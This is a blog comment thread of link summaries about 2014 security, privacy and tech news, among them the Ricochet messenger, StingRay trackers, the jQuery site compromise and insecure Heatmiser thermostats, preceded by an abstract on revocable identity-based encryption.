Revocation functionality is necessary and crucial to identity-based cryptosystems. Revocable identity-based encryption (RIBE) has attracted a lot of attention in recent years, many RIBE schemes have been proposed in the literature but shown to be either insecure or inefficient. In this paper, we propose a new scalable RIBE scheme with decryption key exposure resilience by combining Lewko and Waters’ identity-based encryption scheme and complete subtree method, and prove our RIBE scheme to be semantically secure using dual system encryption methodology.
Tomi Engdahl says:
Wired Profiles John Brooks, the Programmer Behind Ricochet
http://it.slashdot.org/story/14/09/21/1635246/wired-profiles-john-brooks-the-programmer-behind-ricochet
Four years ago he began work on a program for encrypted instant messaging that uses Tor hidden services for the protected transmission of communications. The program, which he dubbed Ricochet, began as a hobby. But by the time he finished, he had a full-fledged desktop client that was easy to use, offered anonymity and encryption, and even resolved the issue of metadata
so few people even knew about it.
Then the Snowden leaks happened and metadata made headlines. Brooks realized he already had a solution that resolved a problem everyone else was suddenly scrambling to fix.
Middle-School Dropout Codes Clever Chat Program That Foils NSA Spying
http://www.wired.com/2014/09/new-encrypted-chat-program-thwarts-nsa-eliminating-metadata/
With metadata suddenly in the spotlight, Brooks decided earlier this year to dust off his Ricochet program and tweak it to make it more elegant—he knew he’d still have a problem, however, getting anyone to adopt it. He wasn’t a known name in the security world and there was no reason anyone should trust him or his program.
Enter Invisible.im, a group formed by Australian security journalist Patrick Gray. Last July, Gray announced that he was working with HD Moore, developer of the Metasploit Framework tool used by security researchers to pen-test systems, and with another respected security professional who goes by his hacker handle The Grugq, to craft a secure, open-source encrypted chat program cobbled together from parts of existing anonymity and messaging systems—such as Prosody, Pidgin and Tor. They wanted a system that was highly secure, user friendly and metadata-free. Gray says his primary motivation was to protect the anonymity of sources who contact journalists.
“At the moment, when sources contact a journalist, they’re going to leave a metadata trail, whether it’s a phone call record or instant message or email record [regardless of whether or not the content of their communication is encrypted],” he says. “And that data is currently accessible to authorities without a warrant.”
When Brooks wrote to say he’d already designed a chat program that eliminated metadata, Gray and his group took a look at the code and quickly dropped their plan to develop their own tool, in favor of working with Brooks to develop his.
Tomi Engdahl says:
Mushy spam law’s IDEAL for toothless watchdog: Spamhaus slams CAN-SPAM
One in 10 non-compliance? It’s worse than that, even in the US
http://www.theregister.co.uk/2014/09/22/spam_compliance_survey_spamhaus_response/
Antispam organisation Spamhaus has reacted phlegmatically to a recent survey that one in 10 of the world’s largest online retailers are still violating the CAN-SPAM Act, a full 10 years after the US anti-spam legislation went into effect.
Richard Cox, CIO of The Spamhaus Project, suggested the Online Trust Alliance (OTA)’s figures of one in 10 e-tailers failing to abide by CAN-SPAM because of failures in honouring unsubscribe requests is probably optimistic.
The lax and/or inadequate enforcement regime of North American anti-spam regimes is a root cause of the problem, according to Cox.
“If anything the issue in the USA as things stand is the unenforceability of the regime, [rather] than just the inadequacy of its enforcement. There have been only a handful of actions in the entire 10 years this law has been in force: and even those actions were limited to the most egregious cases, and mostly just ‘add-ons’ to other enforcement actions.”
Things are even worse in the UK, he added.
“The goal of the larger corporate backers of CAN-SPAM seems to have been to reduce or eliminate any right of private legal action by spam victims against those who spammed them. Only ISPs are allowed to take matters to the courts – and only a handful ever have. It’s not worth the money, as extracting actual damages from spammers is usually a fruitless quest,”
Tomi Engdahl says:
The Raid-Proof Hosting Technology Behind ‘The Pirate Bay’
http://yro.slashdot.org/story/14/09/22/0213229/the-raid-proof-hosting-technology-behind-the-pirate-bay
Ernesto reports at TorrentFreak that despite its massive presence the Pirate Bay doesn’t have a giant server park but operates from the cloud, on virtual machines that can be quickly moved if needed. The site uses 21 “virtual machines” (VMs) hosted at different providers, up four machines from two years ago, in part due to the steady increase in traffic. Eight of the VM’s are used for serving the web pages, searches take up another six machines, and the site’s database currently runs on two VMs. The remaining five virtual machines are used for load balancing, statistics, the proxy site on port 80, torrent storage and for the controller. In total the VMs use 182 GB of RAM and 94 CPU cores. The total storage capacity is 620 GB. One interesting aspect of The Pirate Bay is that all virtual machines are hosted with commercial cloud hosting providers, who have no clue that The Pirate Bay is among their customers.
The Pirate Bay Runs on 21 “Raid-Proof” Virtual Machines
By Ernesto
on September 21, 2014
C: 62
Breaking
http://torrentfreak.com/the-pirate-bay-runs-on-21-raid-proof-virtual-machines-140921/
With several million daily visitors The Pirate Bay is one of the 100 most-visited websites on the Internet. Despite its massive presence the website does not have a giant server park. Instead, it operates from the cloud, on 21 virtual machines that can be quickly moved if needed.
Tomi Engdahl says:
ISIS Uses ‘GTA 5′ In New Teen Recruitment Video
http://www.forbes.com/sites/insertcoin/2014/09/20/isis-uses-gta-5-in-new-teen-recruitment-video/
Terrorist group ISIS has combined brutality with social media acumen to become one of the most feared and reviled organizations on earth in recent months
broadcasting
unspeakable acts of violence.
No, playing Grand Theft Auto or other games like it is not likely a precursor to wanting to “upgrade” to real world violence. With GTA 5 specifically, the game has sold over $2B worth of copies since it was released
Obviously there are about a hundred factors listed over “loves GTA 5″ as to why someone would choose to join ISIS, but some believe that video games have the ability to desensitize young people to violence.
No matter how many violent games you play, I think it’s a very, very low percentage of players who actually become desensitized to real life violence in the process.
Still, I’m sure Rockstar is going to be uncomfortable with their game being used as a terrorist recruiting tool.
Tomi Engdahl says:
DuckDuckNo: The privacy-focused search engine is blocked in China
http://thenextweb.com/asia/2014/09/22/duckduckno/
DuckDuckGo, the privacy-focused search engine that lives in Google’s enormous shadow, has joined its big rival and plenty of other western tech firms in being blocked in China.
The past 18 months have seen much progress for DuckDuckGo. Its user base grew significantly amid Edward Snowden’s NSA revelations last year, ending 2013 with over 1 billion searches. An impressive number though that is, Google processes over 100 billion search queries each month — that said, DuckDuckGo has established itself as an option for those that appreciate its approach to privacy.
That point was illustrated when DuckDuckGo became the default private search engine for Apple’s Safari browser earlier this year.
Tomi Engdahl says:
80 PER CENT of app devs SUCK at securing your data, study finds
Ignore that, look at my shiny-shiny
http://www.theregister.co.uk/2014/09/23/app_devs_suck_at_security_says_trainer/
Developers are experts in spinning wonderfully-shiny, horribly-insecure apps, according to research from Aspect Security.
Social media meeting buttons and go-live dates rate far higher with app developers than the need to ensure the security of private data.
Worse, devs couldn’t secure apps if they wanted to, according to the company’s year-long study.
The majority of some 1,400 random devs from 700 businesses flunked a set of multiple-choice application security tests covering 53 topics, obtaining a 60 per cent mark and a “D” rating.
The most terrible carnage was found in the protection of sensitive data, which 80 per cent of developers flunked.
Security architecture and models baffled three quarters of responding devs who chose the wrong answer in what may answer the question of why architecture-level vulnerabilities existed in apps.
“You would think that after 15 years of securing sessions in web applications, this area would be
a simple one for developers,” the report authors wrote
“Securing sessions improperly leads to session hijacking and other attacks. Developers must understand that session ids are just as sensitive as passwords and must be protected accordingly.”
Tomi Engdahl says:
Before Using StingRays, Police Must Sign NDA With FBI
http://yro.slashdot.org/story/14/09/22/1851246/before-using-stingrays-police-must-sign-nda-with-fbi
Advanced cell phone tracking devices known as StingRays allow police nationwide to home in on suspects and to log individuals present at a given location. But before acquiring a StingRay, state and local police must sign a nondisclosure agreement with the FBI
Before deploying StingRays, police departments must sign nondisclosure agreement with FBI
https://www.beaconreader.com/muckrock/before-deploying-stingrays-police-departments-must-sign-nondisclosure-agreement-with-fbi
The document released by the Tacoma Police Department is heavily redacted — four of its six pages are completely blacked out — but two unredacted paragraphs confirm the FBI’s intimate involvement with StingRay deployment across the country.
The StingRay family of trackers are manufactured by the Harris Corporation, a company with $5 billion in annual revenue and headquarters in Melbourne, Florida. As “cell site simulators,” the trackers trick mobile phones into connecting to a StingRay as if it were a cell tower.
Tomi Engdahl says:
Apple passcode-protects iOS 8 devices, but cops can still inhale your iCloud
Don’t congratulate yourselves too soon, Apple – securobod
http://www.theregister.co.uk/2014/09/23/icloud_hole_in_ios8_passcode_protection/
Improved security features in iOS 8 prevent Apple from unlocking phones – even for law enforcement. But search warrant-holding cops can still get almost everything through iCloud backups, according to ElcomSoft.
Katalov said that the iOS 8 security enhancements will render one of the computer forensics products the Russian firm sells to law enforcement ineffective.
“That will affect only one of our products – ElcomSoft iOS Forensic Toolkit, designed for physical device acquisition (and anyway, for iPhone 4S+, it supported jailbroken devices only without jailbreak, physical acquisition was available only to Apple itself),” Katalov told El Reg
However, a browse through Apple’s document on government information requests reveals links to Apple’s guidelines for law enforcement requests that paint a different picture (see links to guidelines for the US, EMEA and APAC – warning: all PDFs).
The “Information Available From Apple” section reveals all sorts of information is potentially accessible from the manufacturer
The T&Cs leave plenty of wiggle room for Apple to hand over data for reasons ranging from “comply[ing] with legal process or request” to “detect, prevent or otherwise address security, fraud or technical issues”, among other reasons.
Tomi Engdahl says:
Game pirates ‘donate’ compute power to Bitcoin miners
Repack cracks foists Bitcoin miner hack
http://www.theregister.co.uk/2014/09/23/game_pirates_donate_compute_power_to_bitcoin_miners/
Hundreds of video game pirates have generously, if inadvertently, donated their compute resources to virus writers by downloading Bitcoin miner-infected torrent listings.
Dozens of game torrent files identified by Microsoft threat researchers as malicious have been downloaded thousands of times and were continuing to be seeded (or uploaded) by attackers, victims or seedbox servers.
The dropper detected as TrojanDropper:Win32/Maener.
Infected pirates could cautiously search for the Bitcoin miner running under Windows processes named connost.exe, minerd.exe, svchost.exe or winhost.exe.
Downloading torrents or any third-party software from untrusted or insecure sources placed users at risk
Tomi Engdahl says:
Coconut oil or peach – strategic choices
Support: Information management should be able to support all IT equipment and services that are used by employees of the company. Typically, the issue has been resolved in accordance with standardized workstation models and the mounting. This is usually obtained about 80 percent of users quite happy. After all, with a continuous debate about how much the standard can be flexible.
Security: If the network (or even an individual workstation) that is installed you just will not take long, when the company has a virus or malware. Was to blame anyone, IT is still responsible for the damage, and, ultimately, to blame too loose security policy. The losses may, moreover, be quite extensive.
The easiest way is to prevent users of any changes to client configurations and close the unknown devices from the internal network. All traffic out of the house treated with strict firewalls and spam filters through. This model, in which we are behind firewalls hermetically isolated it-the promised land, could be called Coconuts. Last 20 years, IT organizations are derived from coconut in mind.
In recent years, there has arisen, however, the forces of change that threaten the coconut position of the IT architecture, Holy Grail. Many of the company’s business processes is rotated in non-cloud
services. Internal matters of some debate in public services. BYOD phenomenon is pushing companies form or another. It’s getting increasingly difficult to restrict the users life a nut inside. At the same time data management is becoming increasingly difficult to take responsibility for the company’s entire computing environment, when large parts of it are starting to be outside of your control. What to do?
Future IT can be modeled even if the peaches. Peaches have a hard stone, but it is inside the fruit (the so-called value-added). Although the outer surface dents should not suffer from stone inside. Peach hard and strongly protected form the core of the company’s core data and processes; those who are indispensable to the survival. There is still a need firewalls and strong authentication. All other systems are useful, but not essential. They are a real peach fruit, the food, the people who work and communication can be enhanced, and where people can enjoy their work. If outside the core in the system error occurs or a security breach, it can of course be problems, but does not jeopardize the company’s business.
Source: http://www.tivi.fi/cio/blogit/ict_standard_forum/kookospahkina+vai+persikka+ndash+strategisia+valintoja/a1013288
Tomi Engdahl says:
F-Secure’s free security for older Samsung
Samsung’s device users in Finland, Sweden, Norway and Denmark have free access to the F-Secure Safe data security, which promises protection from malware, identity theft, fraudulent websites and applications as well as network attacks.
“Safe is after the introduction of automatically free of charge for two years, after which the owner can activate for free for one more year,” F-Secure’s Consumer Sales and Marketing Director Perttu Tynkkynen to explain.
The normal annual license price of 49.90 euro
The advantage is not only tied to the purchase of new equipment, but it also offered to existing Samsung users. Available through Samsung uPick
https://play.google.com/store/apps/details?id=com.samsung.samsungupick&hl=fi
Source: http://www.tivi.fi/kaikki_uutiset/fsecuren+ilmaista+tietoturvaa+myos+vanhemmille+samsungeille/a1013808
Tomi Engdahl says:
96 million credit card details stolen – what you should learn from these cases?
the Target company (had pretty appropriate name) to be allocated to a data breach. Alone, more than 20 million payment card renewal caused more than $ 200 million cost.
How many criminals have benefited from this? Krebs pages according to the assessment criminals were selling 1-3 million credit card information, which must also be misused, and the average price of one sold credit card information has been $ 26.85. Criminals have netted only in this way for about $ 53.7 million.
In addition, the economic damage is born with these stolen credit cards on purchases made. This comes on top of other indirect damages that have followed, for example, the campaigns, which are data from the stolen e-mail contact information. Stolen e-mail using the contact has traditionally been attempted, for example, fish and passwords for banking and other criminals points of service.
Krebs reported on 9/14/2014 that cyber criminals operators of trading venues had come to the sale of a significant amount of credit card information to The Home Depot chain of stores the information as a result of a burglary. Media release, this company has used the crime investigation and repair of $ 62 million. Reduce the sum of insurance indemnities received $ 27 million.
Which of these should learn?
1 The economic damage may be substantial
2 Criminal organizations are organizations one step ahead
3 Educate your staff!
Get ready for the 4th and develop administrative processes
5 Determine whether you have enough available technical control
The better and more sophisticated you will be able to monitor what is happening in telecommunications, log and analyze these data as well as to respond to the findings, the smaller the damage will be.
If Stuxnet work time, closed networks, and industrial automation on cyber-risk wake-up call, now these two broad knowledge burglary should shake open the last eyes in all organizations!
If you or your organization is dealing with money electronically, it acts as a guaranteed honey-like bait for criminals.
Source: http://www.tivi.fi/blogit/turvasatama/96+miljoonan+luottokortin+tiedot+varastettu+ndash+mita+naista+tapauksista+kannattaa+oppia/a1013568
Tomi Engdahl says:
Apple’s TouchID Fingerprint Scanner: Still Hackable
http://apple.slashdot.org/story/14/09/23/218212/apples-touchid-fingerprint-scanner-still-hackable
A year ago, security researcher Marc Rogers demonstrated how to spoof the TouchID sensor in the iPhone 5S using some Elmer’s glue and glycerol — oh, and a high resolution camera and a laser printer.
he again hacks the iPhone 6′s TouchID sensors using the same method
Tomi Engdahl says:
Obama wants the Security Council binding on all UN countries to enact laws to punish the ones who go abroad to join terrorist groups. The United States wants to make punishable the assistance of such people and financing.
The New York Times that this is the first time that the recruitment of terrorists defined and made punishable internationally. It is pretty impossible to show that someone is preparing to go abroad to join a terrorist organization, or that someone has committed crimes abroad.
The problem is, of course display: Nobody is going to not report to the police, that is going to go abroad to join Isisiin or that have returned from Syria they they have committed crimes there.
Source: http://www.hs.fi/ulkomaat/Obama+haluaa+uusia+terrorismilakeja+kaikkiin+maihin/a1411521634398?ref=hs-art-new-1
Tomi Engdahl says:
Apple iOS7 full of holes
Apple launched last week its users to download the new iOS operating system.
iOS8 rsion brings a host of new features, but also the solution or patch. Swedish Sophos security of the house, the part of the vulnerabilities in iOS7 were critical. The new platform will fix more than 40 of the old iOS vulnerabilities. Sophos has made a video on most serious of them:
10 security holes that cybercrooks dream about – 60 Sec Security [VIDEO]
http://nakedsecurity.sophos.com/2014/09/20/10-security-holes-that-cybercrooks-dream-about-60-sec-security-video/
Sophos also says Android has security problems. According to Sophos Android has a big security risk, which is called the Android browser. It allows up to read the user’s personal information. The company recommends to use safer browsers such as Chrome, Doplhin, Opera or Firefos.
Source: http://etn.fi/index.php?option=com_content&view=article&id=1812:applen-ios8-taynna-reikia&catid=13&Itemid=101
Tomi Engdahl says:
Bitcoin-mining company Butterfly Labs shut down by FTC
http://www.cnet.com/news/bitcoin-mining-company-butterfly-labs-shut-down-by-ftc/
Company marketed specialized computers designed to produce the cryptocurrency but delivered useless machines, according to an FTC complaint.
A bitcoin-related company that allegedly engaged in deceptive marketing of specialized computers designed to produce the cryptocurrency has been shut down at the request of the US Federal Trade Commission.
“We often see that when a new and little-understood opportunity like bitcoin presents itself, scammers will find ways to capitalize on the public’s excitement and interest,”
Bitcoin, which is unregulated and allows for anonymous, untraceable transactions, can be obtained by purchasing it on an exchange or accepting it as payment for goods or services. The peer-to-peer currency can also be generated, or “mined,” by solving complex mathematical equations, a process that requires greater computational effort as the pool of possible solutions shrinks. The amount of bitcoins possible is capped at 21 million; there are currently 13.3 million bitcoins in existence.
To perform the arduous mining process, the company marketed what it called a cutting-edge computer for as much as $29,899, the FTC alleged. A
The virtual currency sprang up in 2009 but its acceptance has grown dramatically in the past couple of months. Cryptocurrency ATMs have begun to pop up, some casinos have said they would accept digital currency payments, and even eBay has begun allowing for limited sales of Bitcoins on its US and UK sites.
Tomi Engdahl says:
Netflix refuses CRTC demand to hand over subscriber data
Video streaming company not ‘in a position to produce competitively sensitive information’
http://www.cbc.ca/news/business/netflix-refuses-crtc-demand-to-hand-over-subscriber-data-1.2774921
Netflix says it won’t turn over confidential subscriber information to Canada’s broadcast regulator in order to safeguard private corporate information.
The video streaming company was ordered last week to give the data to the Canadian Radio-television and Telecommunications Commission by Monday, along with information related to the Canadian content it creates or provides to subscribers.
A Netflix official said Tuesday that while the company has responded to a number of CRTC requests, it is not “in a position to produce the confidential and competitively sensitive information.”
Tomi Engdahl says:
Securing Trustworthy & Resilient Chips
NSF and SRC team to make chips counterfeit- and hack-free
http://www.eetimes.com/document.asp?doc_id=1324043&
Nine universities, from a field of more than 50 applicants, have been chosen to receive $4 million over three years to develop Secure, Trustworthy, Assured, and Resilient Semiconductors and Systems. The STARSS program is supported by the National Science Foundation (NSF) and the Semiconductor Research Corporation (SRC) as well as SRC member companies Intel, Freescale, and Mentor Graphics.
The STARSS program is part of a $75 million cyber security effort by the NSF, but is unique in that it is aimed at making the chips themselves — especially processors — immune from being exploited by hackers who take advantage of hidden Trojan horses and backdoors that are intentionally or unintentionally inserted into chips by intellectual property (IP) often from foreign sources. The effort will also make it easier to spot counterfeit chips, chips having been tampered with somewhere along the supply chain, and used chips being passed off as new.
“NFS and SRC are initially funding nine projects [listed below] with $4 million in a multi-phase project that will likely spend $10 million over several years,”
Tomi Engdahl says:
“Shocking” Android browser bug could be a “privacy disaster”: here’s how to fix it
http://nakedsecurity.sophos.com/2014/09/16/shocking-android-browser-bug-could-be-a-privacy-disaster-heres-how-to-fix-it/
Independent security researcher Rafay Baloch has written about a security bug in the Android Browser app that allows one website to steal data from another.
The guys over at Metasploit are calling it a “Privacy Disaster,”
What to do?
Stop using Browser if you have it installed.
You almost certainly can’t uninstall it, because it’s usually part of the operating system build itself, meaning it doesn’t show up under Settings | Apps | Downloaded.
But if you tap on Browser from the All apps page, you should see a [Disable] button
This will let you disarm the danger by preventing you from using the risky Browser app again.
Well-known replacement browsers include Firefox, Chrome and Dolphin.
Tomi Engdahl says:
jQuery site popped to serve malware slop
Visited September 18? Time to REFORMAT.
http://www.theregister.co.uk/2014/09/24/jquery_site_popped_to_serve_malware_slop/
The jQuery site served credential-stealing malware to scores of users who visited the website on September 18, researcher James Pleger says.
The super-popular JavaScript library was used by 30 percent of websites including 70 percent of the 10,000 most popular sites which may have been compromised by the RIG exploit kit.
jQuery security bods found no evidence that its site was foisting the drive-by download however.
Pleger said the malware did not affect jQuery itself but did infect the website and urged those who visited the site during the alleged attack to re-image their machines.
“However, discovering information-stealing malware on jQuery.com is particularly disconcerting because of the demographic of jQuery users [who are] generally IT systems administrators and web developers, including a large contingent who work within enterprises,” he said.
The Risk IQ research director found the compromise during a website scan and found a malicious script tag was delivering Rig through an invisible iframe.
Tomi Engdahl says:
Popular Wi-Fi Thermostat Full of Security Holes
http://it.slashdot.org/story/14/09/24/014218/popular-wi-fi-thermostat-full-of-security-holes
Heatmiser, a U.K.-based manufacturer of digital thermostats, is contacting its customers today about a series of security issues that could expose a Wi-Fi-connected version of its product to takeover. Andrew Tierney, a “reverse-engineer by night,” whose specialty is digging up bugs in embedded systems wrote on his blog, that he initially read about vulnerabilities in another one of the company’s products
Tomi Engdahl says:
Heatmiser digital thermostat users: For pity’s sake, DON’T SWITCH ON the WI-FI
A stranger turns up YOUR heat with default password 1234
http://www.theregister.co.uk/2014/09/24/heatmiser_digital_thermostat_insecure/
Digital thermostats from Heatmiser are wide open to takeover thanks to default login credentials and myriad other security flaws.
The UK-based manufacturer has promised to develop a fix. Pending the arrival of a patch, users are advised to disable the device’s Wi-Fi capability.
The security flaws were discovered by Andrew Tierney, a reverse engineer who specialises in locating flaws in embedded computing kit. Tierney began probing for flaws in Heatmiser’s Wi-Fi-enabled thermostats after reading about problems in another (old and discontinued) Heatmiser product, NetMonitor.
n response, Heatmiser has contacted its customers, acknowledging some of the problems and promising to improve security of the devices.
A security issue has been identified on our WiFi Thermostat… It has been identified that if certain steps are carried out, the username and password to your system can be obtained therefore allowing remote access of your system.
We are working as quickly as possible to resolve this issue but in the meantime would ask that you remove the port forwarding to your WiFi Thermostat in your router. This means that remote web browser access won’t work but you will be able to use the SmartPhone App.
Tomi Engdahl says:
Money
US personal finance
One whistleblower gets $30m in the bank, but others count the personal cost
http://www.theguardian.com/money/2014/sep/23/whistleblower-bank-personal-cost-sec?utm_source=digg&utm_medium=email
The SEC this week promised an overseas whistleblower $30m – but others who have uncovered wrongdoing haven’t been so lucky
This week, the Securities and Exchange Commission made history by promising an anonymous overseas whistleblower a reward of $30m.
It doesn’t usually work out that way for whistleblowers. Ringing the bell on abuse in a company or government usually means losing jobs and status. The norm is pariah treatment and low-wage jobs, as well as trips to the welfare office and the lingering threat of prosecution or intimidation.
Drake, former senior executive at National Security Agency, is well known in the national security circles. In 2006, he leaked information about the NSA’s Trailblazer project to Baltimore Sun.
Drake, unlike other NSA whistleblowers, has the freedom to move freely within any city or state within America. His freedom, however, comes with a very tangible price: his livelihood.
President Obama has approved legislation to help protect federal whistleblowers against retaliation and economic ruin. In November 2012, Obama signed Whistleblower Protection Enhancement Act into law, which was to expand whistleblower protections available to corporate whistleblowers to federal workers.
Tomi Engdahl says:
Emma Watson nude photo threats were apparently a plot to kill 4chan
Site was a hoax orchestrated by viral marketing company
http://www.theverge.com/2014/9/24/6837585/emma-watson-nude-photo-threats-were-hoax-anti-4chan-campaign
Anonymous users of infamous web forum 4chan leaked stolen nude pictures of Jennifer Lawrence, Kate Upton, Kirsten Dunst, and scores of other women on September 1st. Three weeks later, anonymous 4chan users threatened to do it again. Their new target would be Emma Watson
But when the clock struck 12, no naked pictures were released. Instead visitors to emmayouarenext.com were pointed to a marketing company’s homepage, its black background bearing a crossed-out version of 4chan’s four-leaf clover logo, and the hashtag #shutdown4chan written in large white letters. The site was a hoax, designed to draw as many eyes as possible not to actual pictures of Watson but to an apparent campaign set up to attack 4chan.
“None of these women deserve this,” the page states. “Join us as we shutdown 4chan and prevent more pictures from being leaked.”
Tomi Engdahl says:
Sticking with the political climate, Brazier said the industry continued to face fallout from the Snowden disclosures last year, beyond the Chinese backlash. Data residency was driving the siting of data centres in Germany and Switzerland by the likes of Deutsche Telecom.
However, he said much hung on the result of an appeal by Microsoft against a US court decision forcing the handing over of emails residing on a server in Dublin.
Customer concern over the issue was having an undoubted impact on product design, Brazier continued, noting the inclusion of on device encryption in iOS 8. With Android not far behind, “there’s obviously been some talking,” he noted.
This chimed in with the profile of security concerns: the number one issue for CIOs, according to Canalys’ research. For the channel, it was important to focus on security from the outset, as “it gets you beyond the IT department.”
Source: http://www.channelregister.co.uk/2014/09/24/pc_resellers_bounce_back/